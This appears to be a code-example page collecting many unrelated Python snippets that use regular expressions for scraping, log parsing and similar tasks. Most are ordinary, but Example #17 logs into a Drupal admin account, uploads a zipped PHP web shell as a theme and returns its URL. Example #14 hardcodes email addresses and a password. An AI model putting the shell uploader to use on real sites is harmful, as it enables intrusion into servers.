def DownloadUpdate(self, file):
		self.log('Downloading: %s' % file)
		dirfile = os.path.join(self.UpdateTempDir,file)
		dirname, filename = os.path.split(dirfile)
		if not os.path.isdir(dirname):
			try:
				os.makedirs(dirname)
			except:
				self.log('Error creating directory: '  +dirname)
		url = self.SVNPathAddress+urllib.quote(file)
		try:
			if re.findall(".xbt",url):
				self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
				urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8"))
			else: urllib.urlretrieve( url.decode("utf-8"), dirfile.decode("utf-8") )
			self.DownloadedFiles.append(urllib.unquote(url))
			return 1
		except:
			try:
				time.sleep(2)
				if re.findall(".xbt",url):
					self.totalsize = int(re.findall("File length: ([0-9]*)",urllib2.urlopen(url+"?view=log").read())[0])
					urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8"))
				else: urllib.urlretrieve(url.decode("utf-8"), dirfile.decode("utf-8") )
				self.DownloadedFiles.append(urllib.unquote(url))
				return 1
			except:
				self.log("Download failed: %s" % url)
				self.DownloadFailedFiles.append(urllib.unquote(url))
				return 0
Example #2
def ident_author(name, pp=prompt_possibles):
    orig_name = name
    name = ''.join(re.findall('[A-Z0-9]+',name.upper()))
    best_authors = []
    with open('sample_data/author_names.json', 'r') as f:
        j = json.load(f)
        for b in j['results']['bindings']:
            author_orig = b['name']['value']
            uri = b['author']['value']
            author = b['name']['value'].upper()
            subnames = author_orig.split()
            author = ''.join(re.findall('[A-Z0-9]+',author))
            dist = jaccard_ngram_dist(name,author,3)
            best_authors.append(((author_orig,uri),dist))
            if len(subnames)>=2:
                for sname in [subnames[0], subnames[-1]]:
                    sname = ''.join(re.findall('[A-Z0-9]+',sname))
                    dist = jaccard_ngram_dist(name,sname,3)
                    best_authors.append(((author_orig,uri),dist))
            if len(best_authors)>20:
                best_authors.sort(key=lambda x:x[1])
                best_authors = best_authors[:5]
    best_authors.sort(key=lambda x:x[1])
    best_authors = best_authors[:5]
    best_dist = best_authors[0][1]
    possibles = [best_authors[0][0]]
    for author, dist in best_authors[1:]:
        percent_diff = (dist-best_dist)*2/float(dist+best_dist)
        if percent_diff < __CUTOFF__:
            possibles.append(author)
    if len(possibles)>1:
        identified = pp(orig_name, possibles)
    else:
        identified = possibles[0]
    return identified
Example #3
def wigle_print(username, password, netid):
    browser = mechanize.Browser()

    browser.open('http://wigle.net')
    reqData = urllib.urlencode({'credential_0': username,
                                'credential_1': password})

    browser.open('https://wigle.net//gps/gps/main/login', reqData)

    params = {}
    params['netid'] = netid
    reqParams = urllib.urlencode(params)
    respURL = 'http://wigle.net/gps/gps/main/confirmquery/'
    resp = browser.open(respURL, reqParams).read()

    mapLat = 'N/A'
    mapLon = 'N/A'
    rLat = re.findall(r'maplat=.*\&', resp)
    if rLat:
        mapLat = rLat[0].split('&')[0].split('=')[1]

    rLon = re.findall(r'maplon=.*\&', resp)
    if rLon:
        mapLon = rLon[0].split('&')[0].split('=')[1]

    print '[-] Lat: ' + mapLat + ', Lon: ' + mapLon
Example #4
def parse_log(log_file):
    with open(log_file, 'r') as log_file2:
        log = log_file2.read()

    loss_pattern = r"Iteration (?P<iter_num>\d+), loss = (?P<loss_val>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    losses = []
    loss_iterations = []

    fileName= os.path.basename(log_file)
    for r in re.findall(loss_pattern, log):
        loss_iterations.append(int(r[0]))
        losses.append(float(r[1]))

    loss_iterations = np.array(loss_iterations)
    losses = np.array(losses)

    accuracy_pattern = r"Iteration (?P<iter_num>\d+), Testing net \(#0\)\n.* accuracy = (?P<accuracy>[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?)"
    accuracies = []
    accuracy_iterations = []
    accuracies_iteration_checkpoints_ind = []

    for r in re.findall(accuracy_pattern, log):
        iteration = int(r[0])
        accuracy = float(r[1]) * 100

        if iteration % 10000 == 0 and iteration > 0:
            accuracies_iteration_checkpoints_ind.append(len(accuracy_iterations))

        accuracy_iterations.append(iteration)
        accuracies.append(accuracy)

    accuracy_iterations = np.array(accuracy_iterations)
    accuracies = np.array(accuracies)
	
    return loss_iterations, losses, accuracy_iterations, accuracies, accuracies_iteration_checkpoints_ind, fileName
Example #5
def getCategoryUrl(site="",url=""):
    catDb = openTable(tableName=global_setting['catTable'])
    r = session.get(url)
    if not r.text:
        return False

    soup = BeautifulSoup(r.text)
    for level1 in soup.select('.classify_books'):
        curLevel1 = level1.select('.classify_title')[0].text
        curLevel1 = re.sub('\s', '', curLevel1)
        for level2 in level1.select('.classify_kind'):
            curLevel2 = level2.select('.classify_kind_name')[0].text
            curLevel2 = re.sub('\s', '', curLevel2)
            for level3 in level2.select('ul li a'):
                #curLevel3 = re.sub('\s', '', level3.text)
                curLevel3 =  level3.text.strip()
                curlUrl = level3['href']
                retFind = re.findall(r'\/cp(.*)\.html',curlUrl)
                if retFind:
                    curCatID = retFind[0]
                    catType = 'book'
                else:
                    retFind = re.findall(r'\/cid(.*)\.html',curlUrl)
                    if retFind:
                        curCatID = retFind[0]
                        catType = 'nonbook'
                if retFind:
                    if catDb.find({'catId':curCatID}).count() >0:
                        logger.debug('category %s exists, skip\n' % (curCatID))
                    else:
                        catDb.insert({'catId':curCatID,'level1':curLevel1, 'level2':curLevel2, 'level3':curLevel3, 'catUrl':curlUrl,'catType':catType, 'site':site})
    return True
Example #6
def __load_testdata(file):
   """
   Reads the testdata out of a file.  Testdata consists of exactly three 
   strings on each line, each one enclosed in quotation marks (" or ').  
   The first is the filename to be parsed, the second is the series name
   that should be parsed out of it, and the third is the issue number string
   that should be parsed out of it.
   
   Blank lines and lines that begin with # are ignored.
   """
   retval = []
   if File.Exists(file): 
      with StreamReader(file, Encoding.UTF8, False) as sr:
         line = sr.ReadLine()
         while line is not None:
            line = line.strip()
            if len(line) > 0 and not line.startswith("#"):
               if line.startswith('"'):
                  data = re.findall(r'"(.*?)"', line)
               else:
                  data = re.findall(r"'(.*?)'", line)
               if len(data) == 3:
                  data.append("")
               if len(data) != 4:
                  raise Exception("badly formatted test data");
               retval.append( data ) 
            line = sr.ReadLine()
   return retval
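A minimal runnable sketch (the sample line below is an illustrative assumption, not taken from any real test file) of how the quoted-triple format described in the docstring is parsed:

import re

sample = '"Amazing Spider-Man 129.cbz" "Amazing Spider-Man" "129"'
data = re.findall(r'"(.*?)"', sample)   # three quoted fields
if len(data) == 3:
    data.append("")                     # pad with an empty fourth field, as __load_testdata does
print data   # ['Amazing Spider-Man 129.cbz', 'Amazing Spider-Man', '129', '']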
Example #7
    def __search(self, titles, year, season='0'):
        try:
            query = self.search_link % (urllib.quote_plus(titles[0]))
            query = urlparse.urljoin(self.base_link, query)

            t = [cleantitle.get(i) for i in set(titles) if i]
            y = ['%s' % str(year), '%s' % str(int(year) + 1), '%s' % str(int(year) - 1), '0']

            r = client.request(query)

            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'list_movies'})
            r = dom_parser.parse_dom(r, 'div', attrs={'class': 'item_movie'})
            r = dom_parser.parse_dom(r, 'h2', attrs={'class': 'tit'})
            r = dom_parser.parse_dom(r, 'a', req='href')
            r = [(i.attrs['href'], i.content.lower()) for i in r if i]
            r = [(i[0], i[1], re.findall('(.+?) \(*(\d{4})', i[1])) for i in r]
            r = [(i[0], i[2][0][0] if len(i[2]) > 0 else i[1], i[2][0][1] if len(i[2]) > 0 else '0') for i in r]
            r = [(i[0], i[1], i[2], re.findall('(.+?)\s+(?:\s*-?\s*(?:season|s))\s*(\d+)', i[1])) for i in r]
            r = [(i[0], i[3][0][0] if len(i[3]) > 0 else i[1], i[2], i[3][0][1] if len(i[3]) > 0 else '0') for i in r]
            r = [(i[0], i[1], i[2], '1' if int(season) > 0 and i[3] == '0' else i[3]) for i in r]
            r = sorted(r, key=lambda i: int(i[2]), reverse=True)  # with year > no year
            r = [i[0] for i in r if cleantitle.get(i[1]) in t and i[2] in y and int(i[3]) == int(season)][0]

            return source_utils.strip_domain(r)
        except:
            return
Example #8
 def extractSrcFileData(self, path):
     fileinput.close()
     isLocListener = False
     # escape the literal '$' and '()' so these smali method signatures actually match
     wakeLockAcqRegex = r"invoke-virtual(.*?)Landroid/os/PowerManager\$WakeLock;->acquire\(\)"
     domRegex = r"invoke-virtual(.*?)Ljavax/xml/parsers/DocumentBuilderFactory;->newDocumentBuilder\(\)"
     saxRegex = r"invoke-virtual(.*?)Ljavax/xml/parsers/SAXParserFactory;->newSAXParser\(\)"
     xmlppRegex = r"invoke-static(.*?)Landroid/util/Xml;->newPullParser\(\)"
     for line in fileinput.input([path]):
         matches = re.findall(wakeLockAcqRegex, line)
         if len(matches) > 0:
             self.numNoTimeoutWakeLocks = self.numNoTimeoutWakeLocks + 1
         if line.startswith(".implements Landroid/location/LocationListener;"):
             self.numLocListeners = self.numLocListeners + 1
             isLocListener = True
         if isLocListener:
             if "\"gps\"" in line:
                 self.numGpsUses = self. numGpsUses + 1
         matches = re.findall(domRegex, line)
         if len(matches) > 0:
             self.numDomParser = self.numDomParser + 1
         matches = re.findall(saxRegex, line)
         if len(matches) > 0:
             self.numSaxParser = self.numSaxParser + 1
         matches = re.findall(xmlppRegex, line)
         if len(matches) > 0:
             self.numXMLPullParser = self.numXMLPullParser + 1
Example #9
def ReadProtonCounts(inchi):
    import re

    #Get inchi layers
    layers = inchi.split('/')
    ProtLayer = ''
    FixedLayer = ''
    for l in layers[1:]:
        if 'C' in l and 'H' in l:
            atoms = re.findall(r"[a-zA-Z]+", l)
            indexes = [int(x) for x in re.findall(r"\d+", l)]
            formula = [list(x) for x in zip(atoms, indexes)]
        if 'h' in l and ProtLayer != '':
            FixedLayer = l[1:]
        if 'h' in l and ProtLayer == '':
            ProtLayer = l[1:]

    #initialize proton list
    nheavy = sum([x[1] for x in formula if x[0] != 'H'])

    #Find, save and remove tautomeric portions from main proton layer
    tautomerics = re.findall(r"\(.*?\)", ProtLayer)
    ProtLayer = re.sub(r"\(.*?\)", "", ProtLayer)
    if ProtLayer[-1] == ',':
        ProtLayer = ProtLayer[:-1]

    #Read the main and the fixed proton layer
    protons = ReadPSections(ProtLayer, nheavy)
    fprotons = ReadPSections(FixedLayer, nheavy)

    return protons, formula, tautomerics, fprotons
Example #10
    def _real_extract(self, url):
        video_id = self._match_id(url)
        webpage = self._download_webpage(url, video_id)

        title = self._html_search_meta('title', webpage, 'title', fatal=True)
        TITLE_SUFFIX = ' - TeacherTube'
        if title.endswith(TITLE_SUFFIX):
            title = title[:-len(TITLE_SUFFIX)].strip()

        description = self._html_search_meta('description', webpage, 'description')
        if description:
            description = description.strip()

        quality = qualities(['mp3', 'flv', 'mp4'])

        media_urls = re.findall(r'data-contenturl="([^"]+)"', webpage)
        media_urls.extend(re.findall(r'var\s+filePath\s*=\s*"([^"]+)"', webpage))
        media_urls.extend(re.findall(r'\'file\'\s*:\s*["\']([^"\']+)["\'],', webpage))

        formats = [
            {
                'url': media_url,
                'quality': quality(determine_ext(media_url))
            } for media_url in set(media_urls)
        ]

        self._sort_formats(formats)

        return {
            'id': video_id,
            'title': title,
            'thumbnail': self._html_search_regex(r'\'image\'\s*:\s*["\']([^"\']+)["\']', webpage, 'thumbnail'),
            'formats': formats,
            'description': description,
        }
Example #11
 def evalAtom(self, atom, param_names):
     if atom in self.consts:
         return '(const _%s)'%atom
     elif atom in param_names:
         return '(param (paramref \"%s\"))'%atom
     elif re.match(r'^\d+$', atom):
         return '(const (intc %s))'%atom
     elif atom.lower() in ['true', 'false']:
         return '(const (boolc %s))'%atom.lower()
     elif re.match(r'^forall.*end$', atom) or re.match(r'^exists.*?end$', atom):
         if re.match(r'^forall.*end$', atom):
             params, text = re.findall(r'forall(.*?)do(.*)end', atom)[0]
         else:
             params, text = re.findall(r'exists(.*?)do(.*)end', atom)[0]
         param_name_dict, param_defs = analyzeParams(params)
         for p in param_names:
             if p not in param_name_dict: param_name_dict[p] = 0
         text = self.splitText(text)
         sub_form = self.evaluate(self.process(text), param_name_dict)
         if re.match(r'^forall.*?end$', atom):
             return '(forallFormula %s %s)'%(param_defs, sub_form)
         else:
             return '(existFormula %s %s)'%(param_defs, sub_form)
     else:
         return '(var %s)'%self.evalVar(atom)
Example #12
	def showCovers_adddetail_csfd(self, data, title):
		title_s = re.findall('<title>(.*?)\|', data, re.S)
		if title_s:
			if title_s[0] != "Vyhled\xc3\xa1v\xc3\xa1n\xc3\xad ":
				csfd_title = title_s[0]
			else:
				csfd_title = title
			print "EMC csfd: Movie name - %s" % csfd_title
		else:
			csfd_title = title
		bild = re.findall('<img src="(//img.csfd.cz/files/images/film/posters/.*?|//img.csfd.cz/posters/.*?)" alt="poster"', data, re.DOTALL | re.IGNORECASE)
		if bild:
			print "EMC csfd: Cover Select - %s" % title
			self.cover_count = self.cover_count + 1
			csfd_url = "http:" + bild[0].replace('\\','').strip()
			self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
			self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
			bild = re.findall('<h3>Plak.*?ty</h3>(.*?)</table>', data, re.S)
			if bild:
				bild1 = re.findall('style=\"background-image\: url\(\'(.*?)\'\)\;', bild[0], re.DOTALL | re.IGNORECASE)
				if bild1:
					for each in bild1:
						print "EMC csfd: Cover Select - %s" % title
						self.cover_count = self.cover_count + 1
						csfd_url = "http:" + each.replace('\\','').strip()
						self.menulist.append(showCoverlist(csfd_title, csfd_url, self.o_path, "csfd: "))
						self["info"].setText((_("found") + " %s " + _("covers")) % (self.cover_count))
				else:
					print "EMC csfd 3 : no else covers - %s" % title
			else:
				print "EMC csfd 2 : no else covers - %s" % title
		else:
			print "EMC csfd 1 : keine infos gefunden - %s" % title
Example #13
def __get_dom_elements(item, name, attrs):
    if not attrs:
        pattern = '(<%s(?:\s[^>]*>|/?>))' % (name)
        this_list = re.findall(pattern, item, re.M | re.S | re.I)
    else:
        last_list = None
        for key, value in attrs.iteritems():
            value_is_regex = isinstance(value, re_type)
            value_is_str = isinstance(value, basestring)
            pattern = '''(<{tag}[^>]*\s{key}=(?P<delim>['"])(.*?)(?P=delim)[^>]*>)'''.format(tag=name, key=key)
            re_list = re.findall(pattern, item, re.M | re.S | re.I)
            if value_is_regex:
                this_list = [r[0] for r in re_list if re.match(value, r[2])]
            else:
                temp_value = [value] if value_is_str else value
                this_list = [r[0] for r in re_list if set(temp_value) <= set(r[2].split(' '))]
                
            if not this_list:
                has_space = (value_is_regex and ' ' in value.pattern) or (value_is_str and ' ' in value)
                if not has_space:
                    pattern = '''(<{tag}[^>]*\s{key}=((?:[^\s>]|/>)*)[^>]*>)'''.format(tag=name, key=key)
                    re_list = re.findall(pattern, item, re.M | re.S | re.I)
                    if value_is_regex:
                        this_list = [r[0] for r in re_list if re.match(value, r[1])]
                    else:
                        this_list = [r[0] for r in re_list if value == r[1]]
    
            if last_list is None:
                last_list = this_list
            else:
                last_list = [item for item in this_list if item in last_list]
        this_list = last_list
    
    return this_list
Example #14
def weatherReport():
	htmlfile = urllib.urlopen('http://www.weather.com/weather/today/Mahomet+IL+61853:4:US')
	htmltext = htmlfile.read()

	rnTemp =  '<span itemprop="temperature-fahrenheit">(.+?)</span>'
	conditions = '<div class="wx-phrase ">(.+?)</div>'
	tonightTemp = '<div class="wx-temperature">(.+?)</div>'

	rntPattern = re.compile(rnTemp)
	conditionsPattern = re.compile(conditions)
	tonightTempPattern = re.compile(tonightTemp)


	rntInstance = re.findall(rntPattern, htmltext)
	conditionsInstance = re.findall(conditionsPattern, htmltext)
	tonightTempInstance = re.findall(tonightTempPattern, htmltext)

	
	currentConditions = conditionsInstance[0]
	tonightConditions = conditionsInstance[2]
	currentTemp  = rntInstance[0]
	tonightTemp = tonightTempInstance[2][:2]
	print currentTemp

	to = ['colts8729@gmail.com', 'lisa@selig.com']
	sender = 'weather.bot1'
	subject = 'Your Daily Weather Forecast is Here'
	bodymsg = "Right now: " + currentTemp +' degrees.' + '  '  + currentConditions + '.' + "\n"  +"Tonight: "  + \
			   tonightTemp + ' degrees.' + '  ' + tonightConditions + '.\n\n' + "Read more about today's weather here: "\
			   "http://www.weather.com/weather/today/Mahomet+IL+61853:4:US" + "\n"  + "This message was mad by request via WeatherBot.\nHave a great day."

	for address in to:
		createMessage(address, 'weather.bot1@gmail.com', 'skytower', subject, bodymsg)

	return
Example #15
    def get_episode(self,url):
        html = self.fetch_url(url)
        divs = re.findall(r'<div id="fenji_\d+_(asc|\d+)"(.*?)<\/div>', html) 
        result = []
        if divs:
            for div in divs:
                # columns captured by the regex below: link, episode number ("第N集"), subtitle
                r = re.findall(r'<h3><a href="(.*?)" target="_blank" title=".*?">.*?(第\d+集)<\/a></h3><h4>(.+?)</h4>', div[1])

                if r:     # TV series
                    for ep_data in r:
                        result.append({"title":ep_data[1] + " " + ep_data[2],
                                        "img":"",
                                        "url":ep_data[0]})
                                        
                else: 
                    
                    # columns captured by the regex below: link, title, subtitle, episode date ("期数")
                    r = re.findall(r'<h3><a href="(.*?)" target="_blank" title="(.*?)">(.*?)<\/a></h3><h4>(.+?)期</h4>', div[1])
                    if r:  # variety show
                        for ep_data in r:
                            dateA = ep_data[3].split("-")
                            date = ""
                            if len(dateA) == 3:  #2012-08-12
                                date = "%s.%s.%s" % (dateA[2],dateA[1],dateA[0])
                            result.append({"title":ep_data[1] + " " + ep_data[2],
                                        "img":"",
                                        "url":ep_data[0],
                                        "date":date})
        return result           
             
#aa = IkankanResolver("http://data.movie.kankan.com/movie/38534?id=731018")
Example #16
def parse_current_docket(docket_record):
    # grab the file with the URL mangled slightly to grab 100k records
    docket_file = urllib2.urlopen(docket_record['url'] + "&ctl00_ctl00_cphContentMain_MainContent_gvCommentListChangePage=1_100000").read()
    page = pq(etree.fromstring(docket_file, parser))

    docket = dict(docket_record)

    docket['title'] = page('.dyn_wrap h1').text().strip()
    assert docket['title'], 'no title found'

    headers = [item.text().strip() for item in page('.rgMasterTable thead th').items()]

    docket['comments'] = []

    # check if there's a no-records message
    if len(page('.rgMasterTable .rgNoRecords')):
        return docket
    
    for row in page('.rgMasterTable tbody tr').items():
        tds = row.find('td')
        cell_text = [item.text().strip() for item in tds.items()]
        cdata = dict(zip(headers, cell_text))
        
        link = pq(tds[-1]).find('a')

        doc = {
            'url': urlparse.urljoin(docket['url'], link.attr('href')),
            'details': {},
            'release': [fix_spaces(cdata['Release'])],
            'date': cdata['Date Received'],
            'doctype': 'public_submission',
        }

        vc_matches = re.findall(r"ViewComment\.aspx\?id=(\d+)", doc['url'])
        if vc_matches:
            doc['id'] = vc_matches[0]
            doc['subtype'] = 'comment'
            detail_columns = ['Organization', 'First Name', 'Last Name']
        else:
            ep_matches = re.findall(r"ViewExParte\.aspx\?id=(\d+)", doc['url'])
            if ep_matches:
                doc['id'] = "EP-%s" % ep_matches[0]
                doc['subtype'] = 'exparte'
                detail_columns = ['Organization']
            else:
                assert False, "expected either comment or exparte link: %s" % doc['url']

        for rdg_label, cftc_label in (('Organization Name', 'Organization'), ('First Name', 'First Name'), ('Last Name', 'Last Name')):
            if cftc_label in detail_columns and cdata[cftc_label]:
                doc['details'][rdg_label] = cdata[cftc_label]

        docket['comments'].append(doc)

    assert len(docket['comments']) < 100000, "we probably exceeded one page"

    # then strip out all the ones that aren't about this document
    release = fix_spaces(page('a[id*=rptReleases_hlReleaseLink]').text().strip())
    docket['comments'] = [comment for comment in docket['comments'] if comment['release'][0] == release]

    return docket
Example #17
File: cace.py Project: dsrbr/cace
def drupal_upload(url, login, pwd):
  print '[*] Trying to install theme with shell.'
  dpl_sess = drupal_admin(url, login, pwd)
  info = 'name = '+globals.SHELL_NAME+'\ndescription = '+globals.SHELL_NAME+'\npackage = public-action\nversion = VERSION\ncore = 7.x\nfiles[] = '+globals.SHELL_EXT
  page = dpl_sess.get(url+"?q=admin/appearance/install")
  token1 = re.findall('<input type="hidden" name="form_build_id" value="(.*?)" />',page.text)
  token2 = re.findall('<input type="hidden" name="form_token" value="(.*?)" />',page.text)
  if (token1 == []) or (token2 == []):
    print '[-] Failed to get token. Login or password incorrect or not supported Drupal version.'
    sys.exit()
  post = {'form_build_id' : str(token1[0]),
          'form_token' : str(token2[0]),
          'form_id' : 'update_manager_install_form',
          'op' : 'Install'}
  print '[*] Creating %s.zip in current folder.' % (globals.SHELL_NAME)
  arch = zipfile.ZipFile(globals.SHELL_NAME+".zip", 'w')
  arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_EXT, globals.PHP_EXEC)
  arch.writestr(globals.SHELL_NAME+"/"+globals.SHELL_NAME+".info",info)
  arch.close()
  file = {'files[project_upload]' : (globals.SHELL_NAME+".zip",open(globals.SHELL_NAME+".zip",'rb'),'application/zip')}
  print '[*] Trying to upload zip file.'
  up = dpl_sess.post(url+"?q=admin/appearance/install",files=file,data=post,timeout=None)
  get_link = re.findall('URL=(.*?)" />',up.text)
  if not get_link:
    print '[-] Failed to upload zip file. Try one more time.'
    sys.exit()
  link = str(get_link[0]).replace('&amp;','&')
  dpl_sess.get(link)
  shell = url+"sites/all/themes/"+globals.SHELL_NAME+"/"+globals.SHELL_EXT
  check = dpl_sess.get(shell)
  if check.status_code == 200:
    return shell
  else:
    print '[-] Themes or tmp directories is not writable.'
    sys.exit()
Example #18
    def getCssLinks(self):
        """获取css文件中的链接(一般主要有图片和其他css文件)"""
        f = open(self.file)
        css = f.read()
        f.close()

        def getNewLink(cl):
            up = urlparse(self.url)
            if (not up.path) or ('../' not in cl):
                return cl

            cs = cl.count('../')+1
            newlink = up.scheme+'://'+up.netloc+'/'.join(up.path.split('/')[:-cs])
            newlink = re.sub(r'(\.\./)+', newlink+'/', cl)
            return newlink

        # image links
        picLinks = re.findall(r'background:\s*url\s*\([\'\"]?([a-zA-Z0-9/\._-]+)[\'\"]?\)', css, re.I)
        # other CSS links
        cssLinks = re.findall(r'@import\s*[\'\"]*([a-zA-Z0-9/\._-]+)[\'\"]*', css, re.I)
        Links = picLinks + cssLinks
        cLinks = []
        for cl in Links:
            cLinks.append(getNewLink(cl))

        return cLinks
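A runnable sketch of the two patterns used above, applied to a fabricated CSS fragment (the file content is an assumption for illustration):

import re

css = "body { background: url('img/bg_01.png'); }\n@import 'base/reset.css';"
picLinks = re.findall(r'background:\s*url\s*\([\'\"]?([a-zA-Z0-9/\._-]+)[\'\"]?\)', css, re.I)
cssLinks = re.findall(r'@import\s*[\'\"]*([a-zA-Z0-9/\._-]+)[\'\"]*', css, re.I)
print picLinks   # ['img/bg_01.png']
print cssLinks   # ['base/reset.css']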
Example #19
 def test_list(self):
     # list apps and get their names
     child = pexpect.spawn("{} apps".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps_before = re.findall(r'([-_\w]+) {\w?}', child.before)
     # create a new app
     self.assertIsNotNone(self.formation)
     child = pexpect.spawn("{} apps:create --formation={}".format(
         DEIS, self.formation))
     child.expect('done, created ([-_\w]+)')
     app = child.match.group(1)
     child.expect(pexpect.EOF)
     # list apps and get their names
     child = pexpect.spawn("{} apps".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps = re.findall(r'([-_\w]+) {\w?}', child.before)
     # test that the set of names contains the previous set
     self.assertLess(set(apps_before), set(apps))
     # delete the app
     child = pexpect.spawn("{} apps:destroy --app={} --confirm={}".format(
         DEIS, app, app))
     child.expect('done in ', timeout=5 * 60)
     child.expect(pexpect.EOF)
     # list apps and get their names
     child = pexpect.spawn("{} apps:list".format(DEIS))
     child.expect('=== Apps')
     child.expect(pexpect.EOF)
     apps = re.findall(r'([-_\w]+) {\w?}', child.before)
     # test that the set of names is equal to the original set
     self.assertEqual(set(apps_before), set(apps))
Example #20
File: system.py Project: MrW24/wbot
def memory(inp):
    """memory -- Displays the bot's current memory usage."""
    if os.name == "posix":
        # get process info
        status_file = open('/proc/self/status').read()
        s = dict(re.findall(r'^(\w+):\s*(.*)\s*$', status_file, re.M))
        # get the data we need and process it
        data = s['VmRSS'], s['VmSize'], s['VmPeak'], s['VmStk'], s['VmData']
        data = [float(i.replace(' kB', '')) for i in data]
        strings = [convert_kilobytes(i) for i in data]
        # prepare the output
        out = "Threads: \x02{}\x02, Real Memory: \x02{}\x02, Allocated Memory: \x02{}\x02, Peak " \
              "Allocated Memory: \x02{}\x02, Stack Size: \x02{}\x02, Heap " \
              "Size: \x02{}\x02".format(s['Threads'], strings[0], strings[1], strings[2],
              strings[3], strings[4])
        # return output
        return out

    elif os.name == "nt":
        cmd = 'tasklist /FI "PID eq %s" /FO CSV /NH' % os.getpid()
        out = os.popen(cmd).read()
        memory = 0
        for amount in re.findall(r'([,0-9]+) K', out):
            memory += float(amount.replace(',', ''))
        memory = convert_kilobytes(memory)
        return "Memory Usage: \x02{}\x02".format(memory)

    else:
        return "Sorry, this command is not supported on your OS."
Example #21
def parse_cpu_time(time):
    # return the elapsed time in milliseconds
    # time may be '12m53s', or '0.01s'
    hour_match = re.findall(r'\d+h', time)
    minute_match = re.findall(r'\d+m', time)
    sec_match = re.findall(r'[0-9]+\.*[0-9]*s', time)

    if len(hour_match) == 0:
        hour = 0
    else:
        hour = int(hour_match[0][:-1])

    if len(minute_match) == 0:
        minute = 0
    else:
        minute = int(minute_match[0][:-1])

    if len(sec_match) == 0:
        sec = 0
    else:
        sec = float(sec_match[0][:-1])

    # Return time in units of ms (milliseconds)
    time_ret = int((sec + (minute * 60) + (hour * 3600)) * 1000)
    return time_ret
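A few hedged usage examples for parse_cpu_time (the inputs are assumptions) showing the conversion to milliseconds:

print parse_cpu_time('12m53s')    # 773000  (12*60 + 53 seconds)
print parse_cpu_time('0.01s')     # 10
print parse_cpu_time('1h2m3.5s')  # 3723500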
Example #22
def compile_formula(formula, verbose=False):
    """Compile formula into a function. Also return letters found, as a str,
    in same order as parms of function. The first digit of a multi-digit 
    number can't be 0. So if YOU is a word in the formula, and the function
    is called with Y equal to 0, the function should return False."""

    # modify the code in this function.

    letters = ''.join(set(re.findall('[A-Z]', formula)))
    print letters
    first_letters = set(re.findall('([A-Z])[A-Z]', formula))
    print first_letters
    checklist = ['%s!=0' % (w) for w in first_letters]
    checklist.append('1==1')
    print checklist
    check = ' and '.join(checklist)
    print check
    parms = ', '.join(letters)
    print parms
    tokens = map(compile_word, re.split('([A-Z]+)', formula))
    print tokens
    body = ''.join(tokens)
    print body
    f = 'lambda %s: %s and (%s)' % (parms, body, check)
    if verbose: print f
    return eval(f), letters
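A runnable sketch of the constraint construction above; the formula string is an illustrative assumption, and compile_word is defined elsewhere in the original exercise, so only the regex steps are reproduced here:

import re

formula = 'YOU == ME**2'
letters = ''.join(set(re.findall('[A-Z]', formula)))       # e.g. 'EMOUY' (set order varies)
first_letters = set(re.findall('([A-Z])[A-Z]', formula))   # {'Y', 'M'}: letters that start a multi-digit word
check = ' and '.join(['%s!=0' % w for w in first_letters] + ['1==1'])
print check   # e.g. "Y!=0 and M!=0 and 1==1"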
Example #23
def _strip_and_unquote_list( keys, value ):
    if value[0] == '"':
        # double-quoted values
        m = _DQV.match( value )
        if m:
            value = m.groups()[0]
        values = re.findall( _DQ_L_VALUE, value )
    elif value[0] == "'":
        # single-quoted values
        m = _SQV.match( value )
        if m:
            value = m.groups()[0]

        values = re.findall( _SQ_L_VALUE, value )
    else:
        # unquoted values
        # (may contain internal quoted strings with list delimiters inside 'em!)
        m = _DQV.match( value )
        if m:
            value = m.groups()[0]
        else:
            n = _SQV.match( value )
            if n:
                value = n.groups()[0]

        values = list(_unquoted_list_parse( keys, value ))
        # allow trailing commas
        if values[-1] == '':
            values = values[0:-1]

    return values
Example #24
def LISTSHOWS(murl,channel,index=False):
    link=main.OPENURL(murl)
    link=link.replace('\r','').replace('\n','').replace('\t','').replace('&nbsp;','')
    match = re.findall('<div class="titleline"><h2 class="forumtitle"><a href="(.+?)">(.+?)</a></h2></div>',link)
    label='TV Shows'
    if not len(match) > 0:
        match = re.findall('<h3 class="threadtitle">.+?<a class=".+?" href="(.+?)" id=".+?">(.+?)</a></h3>', link)
        label = 'Movies'
    dialogWait = xbmcgui.DialogProgress()
    ret = dialogWait.create('Please wait until ' + label + ' Show list is cached.')
    totalLinks = len(match)
    loadedLinks = 0
    remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
    dialogWait.update(0, '[B]Will load instantly from now on[/B]',remaining_display)
    xbmc.executebuiltin("XBMC.Dialog.Close(busydialog,true)")
    for url,name in match:
        if "color" in name:
            name=name.replace('<b><font color=red>','[COLOR red]').replace('</font></b>','[/COLOR]')
            name=name.replace('<b><font color="red">','[COLOR red]').replace('</font></b>','[/COLOR]')
        if label == 'Movies':
            main.addDirX(name, MainUrl+url,39,'',searchMeta=True, metaType='Movies')
        else:
            main.addTVInfo(name,MainUrl+url,38,getShowImage(channel,name),'','')
        loadedLinks = loadedLinks + 1
        percent = (loadedLinks * 100)/totalLinks
        remaining_display = label + ' loaded :: [B]'+str(loadedLinks)+' / '+str(totalLinks)+'[/B].'
        dialogWait.update(percent,'[B]Will load instantly from now on[/B]',remaining_display)
        if dialogWait.iscanceled(): return False   
    dialogWait.close()
    del dialogWait
    xbmcplugin.setContent(int(sys.argv[1]), label)
    main.VIEWS()
Example #25
def summary_up_result(result_file, ignore, row_head, column_mark):
    """
    Used to summarize the monitor results or other similar kinds of results. It
    currently calculates the average value for each item in the results, and it
    expects records that are laid out in matrix form.

    @result_file: file containing the results to be summarized
    @ignore: pattern for comment lines in the results that should be thrown away
    @row_head: pattern for the row label at the start of each line
    @column_mark: pattern identifying the first line of the matrix, which is used
    to generate the column items
    Return: A dictionary with the average value of results
    """
    head_flag = False
    result_dict = {}
    column_list = {}
